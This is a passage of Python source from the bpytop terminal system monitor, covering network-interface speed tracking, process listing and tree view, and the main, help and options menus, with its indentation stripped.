net_iface: str = CONFIG.net_iface
sync_top: int = 0
sync_string: str = ""
@classmethod
def _get_nics(cls):
'''Get a list of all network devices sorted by highest throughput'''
cls.nic_i = 0
cls.nics = []
cls.nic = ""
try:
io_all = psutil.net_io_counters(pernic=True)
except Exception as e:
if not cls.nic_error:
cls.nic_error = True
errlog.exception(f'{e}')
if not io_all: return
up_stat = psutil.net_if_stats()
for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True):
if nic not in up_stat or not up_stat[nic].isup:
continue
cls.nics.append(nic)
if not cls.nics: cls.nics = [""]
cls.nic = cls.nics[cls.nic_i]
if cls.net_iface and cls.net_iface in cls.nics:
cls.nic = cls.net_iface
cls.nic_i = cls.nics.index(cls.nic)
@classmethod
def switch(cls, key: str):
if cls.net_iface: cls.net_iface = ""
if len(cls.nics) < 2 and cls.nic in cls.nics:
return
if cls.nic_i == -1:
cls.nic_i = 0 if key == "n" else -1
else:
cls.nic_i += +1 if key == "n" else -1
cls.nic_i %= len(cls.nics)
cls.new_nic = cls.nics[cls.nic_i]
cls.switched = True
Collector.collect(NetCollector, redraw=True)
@classmethod
def _collect(cls):
speed: int
stat: Dict
up_stat = psutil.net_if_stats()
if sorted(cls.nics) != sorted(nic for nic in up_stat if up_stat[nic].isup):
old_nic = cls.nic
cls._get_nics()
cls.nic = old_nic
if cls.nic not in cls.nics:
cls.nic_i = -1
else:
cls.nic_i = cls.nics.index(cls.nic)
if cls.switched:
cls.nic = cls.new_nic
cls.switched = False
if not cls.nic or cls.nic not in up_stat:
cls._get_nics()
if not cls.nic: return
try:
io_all = psutil.net_io_counters(pernic=True)[cls.nic]
except KeyError:
pass
return
if not cls.nic in cls.stats:
cls.stats[cls.nic] = {}
cls.strings[cls.nic] = { "download" : {}, "upload" : {}}
for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]:
cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 }
for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]:
cls.strings[cls.nic][direction][v] = ""
cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv
cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent
for direction in ["download", "upload"]:
stat = cls.stats[cls.nic][direction]
strings = cls.strings[cls.nic][direction]
#* Calculate current speed
stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp)))
stat["last"] = stat["total"]
speed = stat["speed"][-1]
if cls.net_min[direction] == -1:
cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction))
stat["graph_top"] = cls.net_min[direction]
stat["graph_lower"] = 7
if not cls.auto_min:
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
if stat["offset"] and stat["offset"] > stat["total"]:
cls.reset = True
if cls.reset:
if not stat["offset"]:
stat["offset"] = stat["total"]
else:
stat["offset"] = 0
if direction == "upload":
cls.reset = False
NetBox.redraw = True
if len(stat["speed"]) > NetBox.width * 2:
del stat["speed"][0]
strings["total"] = floating_humanizer(stat["total"] - stat["offset"])
strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True)
strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True)
if speed > stat["top"] or not stat["top"]:
stat["top"] = speed
strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True)
if cls.auto_min:
if speed > stat["graph_top"]:
stat["graph_raise"] += 1
if stat["graph_lower"] > 0: stat["graph_lower"] -= 1
elif speed < stat["graph_top"] // 10:
stat["graph_lower"] += 1
if stat["graph_raise"] > 0: stat["graph_raise"] -= 1
if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5:
if stat["graph_raise"] >= 5:
stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8)
elif stat["graph_lower"] >= 5:
stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3)
stat["graph_raise"] = 0
stat["graph_lower"] = 0
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
cls.timestamp = time()
if CONFIG.net_sync:
c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"])
if c_max != cls.sync_top:
cls.sync_top = c_max
cls.sync_string = floating_humanizer(cls.sync_top, short=True)
NetBox.redraw = True
@classmethod
def _draw(cls):
NetBox._draw_fg()
class ProcCollector(Collector):
'''Collects process stats'''
buffer: str = ProcBox.buffer
search_filter: str = ""
processes: Dict = {}
num_procs: int = 0
det_cpu: float = 0.0
detailed: bool = False
detailed_pid: Union[int, None] = None
details: Dict[str, Any] = {}
details_cpu: List[int] = []
details_mem: List[int] = []
expand: int = 0
collapsed: Dict = {}
tree_counter: int = 0
p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"]
sort_expr: Dict = {}
sort_expr["pid"] = compile("p.info['pid']", "str", "eval")
sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval")
sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")
@classmethod
def _collect(cls):
'''List all processess with pid, name, arguments, threads, username, memory percent and cpu percent'''
if not "proc" in Box.boxes: return
out: Dict = {}
cls.det_cpu = 0.0
sorting: str = CONFIG.proc_sorting
reverse: bool = not CONFIG.proc_reversed
proc_per_cpu: bool = CONFIG.proc_per_core
search: str = cls.search_filter
err: float = 0.0
n: int = 0
if CONFIG.proc_tree and sorting == "arguments":
sorting = "program"
sort_cmd = cls.sort_expr[sorting]
if CONFIG.proc_tree:
cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
else:
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt or cls.proc_interrupt:
return
if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
continue
if p.info["cmdline"] == err:
p.info["cmdline"] = ""
if p.info["username"] == err:
p.info["username"] = ""
if p.info["num_threads"] == err:
p.info["num_threads"] = 0
if search:
if cls.detailed and p.info["pid"] == cls.detailed_pid:
cls.det_cpu = p.info["cpu_percent"]
for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
for s in search.split(","):
if s.strip() in value:
break
else: continue
break
else: continue
cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
mem = p.info["memory_percent"]
if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
mem_b = p.info["memory_info"].rss
else:
mem_b = 0
cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
out[p.info["pid"]] = {
"name" : p.info["name"],
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : p.info["num_threads"],
"username" : p.info["username"],
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu }
n += 1
cls.num_procs = n
cls.processes = out.copy()
if cls.detailed:
cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
if cls.expand > 5: cls.expand = 5
if cls.detailed and not cls.details.get("killed", False):
try:
c_pid = cls.detailed_pid
det = psutil.Process(c_pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
cls.details["killed"] = True
cls.details["status"] = psutil.STATUS_DEAD
ProcBox.redraw = True
else:
attrs: List[str] = ["status", "memory_info", "create_time"]
if not SYSTEM == "MacOS": attrs.extend(["cpu_num"])
if cls.expand:
attrs.extend(["nice", "terminal"])
if not SYSTEM == "MacOS": attrs.extend(["io_counters"])
if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
cls.details = det.as_dict(attrs=attrs, ad_value="")
if det.parent() != None: cls.details["parent_name"] = det.parent().name()
else: cls.details["parent_name"] = ""
cls.details["pid"] = c_pid
if c_pid in cls.processes:
cls.details["name"] = cls.processes[c_pid]["name"]
cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
cls.details["username"] = cls.processes[c_pid]["username"]
cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
else:
cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
cls.details["threads"] = f'{cls.details["num_threads"]}'
cls.details["cpu_percent"] = round(cls.det_cpu)
cls.details["killed"] = False
if SYSTEM == "MacOS":
cls.details["cpu_num"] = -1
cls.details["io_counters"] = ""
if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
else: cls.details["memory_bytes"] = "? Bytes"
if isinstance(cls.details["create_time"], float):
uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
else: cls.details["uptime"] = f'{uptime}'
else: cls.details["uptime"] = "??:??:??"
if cls.expand:
if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}'
if SYSTEM == "BSD":
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
else: cls.details["io_write"] = "?"
else:
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
else: cls.details["io_write"] = "?"
if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")
cls.details_cpu.append(cls.details["cpu_percent"])
mem = cls.details["memory_percent"]
if mem > 80: mem = round(mem)
elif mem > 60: mem = round(mem * 1.2)
elif mem > 30: mem = round(mem * 1.5)
elif mem > 10: mem = round(mem * 2)
elif mem > 5: mem = round(mem * 10)
else: mem = round(mem * 20)
cls.details_mem.append(mem)
if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0]
if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0]
@classmethod
def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: str):
'''List all processess in a tree view with pid, name, threads, username, memory percent and cpu percent'''
out: Dict = {}
err: float = 0.0
det_cpu: float = 0.0
infolist: Dict = {}
cls.tree_counter += 1
tree = defaultdict(list)
n: int = 0
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt: return
try:
tree[p.ppid()].append(p.pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
pass
else:
infolist[p.pid] = p.info
n += 1
if 0 in tree and 0 in tree[0]:
tree[0].remove(0)
def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
nonlocal infolist, proc_per_cpu, search, out, det_cpu
name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
cont: bool = True
getinfo: Dict = {}
if cls.collect_interrupt: return
try:
name = psutil.Process(pid).name()
if name == "idle": return
except psutil.Error:
pass
cont = False
name = ""
if pid in infolist:
getinfo = infolist[pid]
if search and not found:
if cls.detailed and pid == cls.detailed_pid:
det_cpu = getinfo["cpu_percent"]
if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = ""
if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = ""
for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
for s in search.split(","):
if s.strip() in value:
found = True
break
else: continue
break
else: cont = False
if cont:
if getinfo:
if getinfo["num_threads"] == err: threads = 0
else: threads = getinfo["num_threads"]
if getinfo["username"] == err: username = ""
else: username = getinfo["username"]
cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
mem = getinfo["memory_percent"]
if getinfo["cmdline"] == err: cmd = ""
else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
mem_b = getinfo["memory_info"].rss
else:
mem_b = 0
else:
threads = mem_b = 0
username = ""
mem = cpu = 0.0
if pid in cls.collapsed:
collapse = cls.collapsed[pid]
else:
collapse = depth > CONFIG.tree_depth
cls.collapsed[pid] = collapse
if collapse_to and not search:
out[collapse_to]["threads"] += threads
out[collapse_to]["mem"] += mem
out[collapse_to]["mem_b"] += mem_b
out[collapse_to]["cpu"] += cpu
else:
if pid in tree and len(tree[pid]) > 0:
sign: str = "+" if collapse else "-"
inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
out[pid] = {
"indent" : inindent,
"name": name,
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : threads,
"username" : username,
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu,
"depth" : depth,
}
if search: collapse = False
elif collapse and not collapse_to:
collapse_to = pid
if pid not in tree:
return
children = tree[pid][:-1]
for child in children:
create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
create_tree(tree[pid][-1], tree, indent + " ", indent + " └─ ", depth=depth+1, collapse_to=collapse_to)
create_tree(min(tree), tree)
cls.det_cpu = det_cpu
if cls.collect_interrupt: return
if cls.tree_counter >= 100:
cls.tree_counter = 0
for pid in list(cls.collapsed):
if not psutil.pid_exists(pid):
del cls.collapsed[pid]
cls.num_procs = len(out)
cls.processes = out.copy()
@classmethod
def sorting(cls, key: str):
index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key == "right" else -1)
if index >= len(CONFIG.sorting_options): index = 0
elif index < 0: index = len(CONFIG.sorting_options) - 1
CONFIG.proc_sorting = CONFIG.sorting_options[index]
if "left" in Key.mouse: del Key.mouse["left"]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
@classmethod
def _draw(cls):
ProcBox._draw_fg()
class Menu:
'''Holds all menus'''
active: bool = False
close: bool = False
resized: bool = True
menus: Dict[str, Dict[str, str]] = {}
menu_length: Dict[str, int] = {}
background: str = ""
for name, menu in MENUS.items():
menu_length[name] = len(menu["normal"][0])
menus[name] = {}
for sel in ["normal", "selected"]:
menus[name][sel] = ""
for i in range(len(menu[sel])):
menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'
@classmethod
def main(cls):
out: str = ""
banner: str = ""
redraw: bool = True
key: str = ""
mx: int = 0
my: int = 0
skip: bool = False
mouse_over: bool = False
mouse_items: Dict[str, Dict[str, int]] = {}
cls.active = True
cls.resized = True
menu_names: List[str] = list(cls.menus.keys())
menu_index: int = 0
menu_current: str = menu_names[0]
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
while not cls.close:
key = ""
if cls.resized:
banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
if UpdateChecker.version != VERSION:
banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
cy = 0
for name, menu in cls.menus.items():
ypos = Term.height // 2 - 2 + cy
xpos = Term.width // 2 - (cls.menu_length[name] // 2)
mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
cy += 3
redraw = True
cls.resized = False
if redraw:
out = ""
for name, menu in cls.menus.items():
out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{banner}{out}')
skip = redraw = False
if Key.input_wait(Timer.left(), mouse=True):
if Key.mouse_moved():
mx, my = Key.get_mouse()
for name, pos in mouse_items.items():
if pos["x1"] <= mx <= pos["x2"] and pos["y1"] <= my <= pos["y2"]:
mouse_over = True
if name != menu_current:
menu_current = name
menu_index = menu_names.index(name)
redraw = True
break
else:
mouse_over = False
else:
key = Key.get()
if key == "mouse_click" and not mouse_over:
key = "M"
if key == "q":
clean_quit()
elif key in ["escape", "M"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "shift_tab"]:
menu_index -= 1
if menu_index < 0: menu_index = len(menu_names) - 1
menu_current = menu_names[menu_index]
redraw = True
elif key in ["down", "mouse_scroll_down", "tab"]:
menu_index += 1
if menu_index > len(menu_names) - 1: menu_index = 0
menu_current = menu_names[menu_index]
redraw = True
elif key == "enter" or (key == "mouse_click" and mouse_over):
if menu_current == "quit":
clean_quit()
elif menu_current == "options":
cls.options()
cls.resized = True
elif menu_current == "help":
cls.help()
cls.resized = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def help(cls):
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
help_items: Dict[str, str] = {
"(Mouse 1)" : "Clicks buttons and selects in process list.",
"Selected (Mouse 1)" : "Show detailed information for selected process.",
"(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
"(Esc, shift+m)" : "Toggles main menu.",
"(m)" : "Cycle view presets, order: full->proc->stat->user.",
"(1)" : "Toggle CPU box.",
"(2)" : "Toggle MEM box.",
"(3)" : "Toggle NET box.",
"(4)" : "Toggle PROC box.",
"(d)" : "Toggle disks view in MEM box.",
"(F2, o)" : "Shows options.",
"(F1, h)" : "Shows this window.",
"(ctrl+z)" : "Sleep program and put in background.",
"(ctrl+c, q)" : "Quits program.",
"(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
"(Up) (Down)" : "Select in process list.",
"(Enter)" : "Show detailed information for selected process.",
"(Spacebar)" : "Expand/collapse the selected process in tree view.",
"(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
"(Home) (End)" : "Jump to first or last page in process list.",
"(Left) (Right)" : "Select previous/next sorting column.",
"(b) (n)" : "Select previous/next network device.",
"(z)" : "Toggle totals reset for current network device",
"(a)" : "Toggle auto scaling for the network graphs.",
"(y)" : "Toggle synced scaling mode for network graphs.",
"(f)" : "Input a string to filter processes with.",
"(c)" : "Toggle per-core cpu usage of processes.",
"(r)" : "Reverse sorting order in processes box.",
"(e)" : "Toggle processes tree view.",
"(delete)" : "Clear any entered filter.",
"Selected (T, t)" : "Terminate selected process with SIGTERM - 15.",
"Selected (K, k)" : "Kill selected process with SIGKILL - 9.",
"Selected (I, i)" : "Interrupt selected process with SIGINT - 2.",
"_1" : " ",
"_2" : "For bug reporting and project updates, visit:",
"_3" : "https://github.com/aristocratos/bpytop",
}
while not cls.close:
key = ""
if cls.resized:
y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-36
h, w = Term.height-2-y, 72
if len(help_items) > h:
pages = ceil(len(help_items) / h)
else:
h = len(help_items)
pages = 0
page = 1
out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
if pages:
out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, (keys, desc) in enumerate(help_items.items()):
if pages and n < (page - 1) * h: continue
out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
if key == "mouse_click":
mx, my = Key.get_mouse()
if x <= mx < x + w and y <= my < y + h + 3:
if pages and my == y and x + 56 < mx < x + 61:
key = "up"
elif pages and my == y and x + 63 < mx < x + 68:
key = "down"
else:
key = "escape"
if key == "q":
clean_quit()
elif key in ["escape", "M", "enter", "backspace", "h", "f1"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
redraw = True
elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
redraw = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def options(cls):
out: str = ""
out_misc : str = ""
redraw: bool = True
selected_cat: str = ""
selected_int: int = 0
option_items: Dict[str, List[str]] = {}
cat_list: List[str] = []
cat_int: int = 0
change_cat: bool = False
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
d_quote: str
inputting: bool = False
input_val: str = ""
Theme.refresh()
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
categories: Dict[str, Dict[str, List[str]]] = {
"system" : {
"color_theme" : [
'Set color theme.',
'',
'Choose from all theme files in',
'"/usr/[local/]share/bpytop/themes" and',
'"~/.config/bpytop/themes".',
'',
'"Default" for builtin default theme.',
'User themes are prefixed by a plus sign "+".',
'',
'For theme updates see:',
'https://github.com/aristocratos/bpytop'],
"theme_background" : [
'If the theme set background should be shown.',
'',
'Set to False if you want terminal background',
'transparency.'],
"shown_boxes" : [
'Manually set which boxes to show.',
'',
'Available values are "cpu mem net proc".',
'Seperate values with whitespace.',
'',
'Toggle between presets with mode key "m".'],
"update_ms" : [
'Update time in milliseconds.',
'',
'Recommended 2000 ms or above for better sample',
'times for graphs.',
'',
'Min value: 100 ms',
'Max value: 86400000 ms = 24 hours.'],
"draw_clock" : [
'Draw a clock at top of screen.',
'Only visible if cpu box is enabled.'
'',
'Formatting according to strftime, empty',
'string to disable.',
'',
'Custom formatting options:',
'"/host" = hostname',
'"/user" = username',
'',
'Examples of strftime formats:',
'"%X" = locale HH:MM:SS',
'"%H" = 24h hour, "%I" = 12h hour',
'"%M" = minute, "%S" = second',
'"%d" = day, "%m" = month, "%y" = year'],
"background_update" : [
'Update main ui when menus are showing.',
'',
'True or False.',
'',
'Set this to false if the menus is flickering',
'too much for a comfortable experience.'],
"show_battery" : [
'Show battery stats.',
'',
'Show battery stats in the top right corner',
'if a battery is present.'],
"show_init" : [
'Show init screen at startup.',
'',
'The init screen is purely cosmetical and',
'slows down start to show status messages.'],
"update_check" : [
'Check for updates at start.',
'',
'Checks for latest version from:',
'https://github.com/aristocratos/bpytop'],
"log_level" : [
'Set loglevel for error.log',
'',
'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
'The level set includes all lower levels,',
'i.e. "DEBUG" will show all logging info.']
},
"cpu" : {
"check_temp" : [
'Enable cpu temperature reporting.',
'',
'True or False.'],
"cpu_sensor" : [
'Cpu temperature sensor',
'',
'Select the sensor that corresponds to',
'your cpu temperature.',
'Set to "Auto" for auto detection.'],
"show_coretemp" : [
'Show temperatures for cpu cores.',
'',
'Only works if check_temp is True and',
'the system is reporting core temps.'],
"custom_cpu_name" : [
'Custom cpu model name in cpu percentage box.',
'',
'Empty string to disable.'],
},
"mem" : {
"mem_graphs" : [
'Show graphs for memory values.',
'',
'True or False.'],
"show_disks" : [
'Split memory box to also show disks.',
'',
'True or False.'],
"show_swap" : [
'If swap memory should be shown in memory box.',
'',
'True or False.'],
"swap_disk" : [
'Show swap as a disk.',
'',
'Ignores show_swap value above.',
'Inserts itself after first disk.'],
"only_physical" : [
'Filter out non physical disks.',
'',
'Set this to False to include network disks,',
'RAM disks and similar.',
'',
'True or False.'],
"use_fstab" : [
'Read disks list from /etc/fstab.',
'(Has no effect on macOS X)',
'',
'This also disables only_physical.',
'',
'True or False.'],
"disks_filter" : [
'Optional filter for shown disks.',
'',
'Should be full path of a mountpoint,',
'"root" replaces "/", separate multiple values',
'with a comma ",".',
'Begin line with "exclude=" to change to exclude',
'filter.',
'Oterwise defaults to "most include" filter.',
'',
'Example: disks_filter="exclude=/boot, /home/user"'],
},
"net" : {
"net_download" : [
'Fixed network graph download value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_upload" : [
'Fixed network graph upload value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_auto" : [
'Start in network graphs auto rescaling mode.',
'',
'Ignores any values set above at start and',
'rescales down to 10KibiBytes at the lowest.',
'',
'True or False.'],
"net_sync" : [
'Network scale sync.',
'',
'Syncs the scaling for download and upload to',
'whichever currently has the highest scale.',
'',
'True or False.'],
"net_color_fixed" : [
'Set network graphs color gradient to fixed.',
'',
'If True the network graphs color is based',
'on the total bandwidth usage instead of',
'the current autoscaling.',
'',
'The bandwidth usage is based on the',
'"net_download" and "net_upload" values set',
'above.'],
"net_iface" : [
'Network Interface.',
'',
'Manually set the starting Network Interface.',
'Will otherwise automatically choose the NIC',
'with the highest total download since boot.'],
},
"proc" : {
"proc_update_mult" : [
'Processes update multiplier.',
'Sets how often the process list is updated as',
'a multiplier of "update_ms".',
'',
'Set to 2 or higher to greatly decrease bpytop',
'cpu usage. (Only integers)'],
"proc_sorting" : [
'Processes sorting option.',
'',
'Possible values: "pid", "program", "arguments",',
'"threads", "user", "memory", "cpu lazy" and',
'"cpu responsive".',
'',
'"cpu lazy" updates top process over time,',
'"cpu responsive" updates top process directly.'],
"proc_reversed" : [
'Reverse processes sorting order.',
'',
'True or False.'],
"proc_tree" : [
'Processes tree view.',
'',
'Set true to show processes grouped by parents,',
'with lines drawn between parent and child',
'process.'],
"tree_depth" : [
'Process tree auto collapse depth.',
'',
'Sets the depth were the tree view will auto',
'collapse processes at.'],
"proc_colors" : [
'Enable colors in process view.',
'',
'Uses the cpu graph gradient colors.'],
"proc_gradient" : [
'Enable process view gradient fade.',
'',
'Fades from top or current selection.',
'Max fade value is equal to current themes',
'"inactive_fg" color value.'],
"proc_per_core" : [
'Process usage per core.',
'',
'If process cpu usage should be of the core',
'it\'s running on or usage of the total',
'available cpu power.',
'',
'If true and process is multithreaded',
'cpu usage can reach over 100%.'],
"proc_mem_bytes" : [
'Show memory as bytes in process list.',
' ',
'True or False.'],
}
}
sorting_i: int = CONFIG.sorting_options.index(CONFIG.proc_sorting)
loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
cpu_sensor_i: int = CONFIG.cpu_sensors.index(CONFIG.cpu_sensor)
color_i: int
cat_list = list(categories)
while not cls.close:
key = ""
